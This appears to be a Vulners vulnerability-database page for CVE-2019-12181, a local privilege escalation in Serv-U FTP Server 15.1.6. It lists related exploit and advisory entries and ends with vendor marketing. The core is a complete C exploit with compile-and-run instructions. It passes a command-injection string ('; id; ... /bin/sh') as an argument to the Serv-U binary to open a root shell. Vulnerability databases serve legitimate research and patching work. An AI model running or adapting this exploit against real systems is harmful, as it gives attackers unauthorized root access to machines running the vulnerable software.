| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| Exploit for CVE-2002-0526 | 12 Mar 202611:02 | – | githubexploit | |
| Serv-U FTP Server < 15.1.7 - Local Privilege Escalation Exploit | 18 Jun 201900:00 | – | zdt | |
| Serv-U FTP Server 15.1.7 prepareinstallation Privilege Escalation Exploit | 2 Jul 201900:00 | – | zdt | |
| Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2) Exploit | 26 Jul 201900:00 | – | zdt | |
| Serv-U FTP Server prepareinstallation Privilege Escalation | 17 Jun 201900:00 | – | attackerkb | |
| CVE-2019-12181 | 18 Jun 201900:00 | – | circl | |
| CVE-2019-12181 | 17 Jun 201915:16 | – | cve | |
| CVE-2019-12181 | 17 Jun 201915:16 | – | cvelist | |
| Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit) | 3 Jul 201900:00 | – | exploitdb | |
| Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2) | 13 Jan 201900:00 | – | exploitdb |
/*
CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation
vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev
to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe
*/
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
int main()
{
char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
// if execv is successful, we won't reach here
printf("ret val: %d errno: %d\n", ret_val, errno);
return errno;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation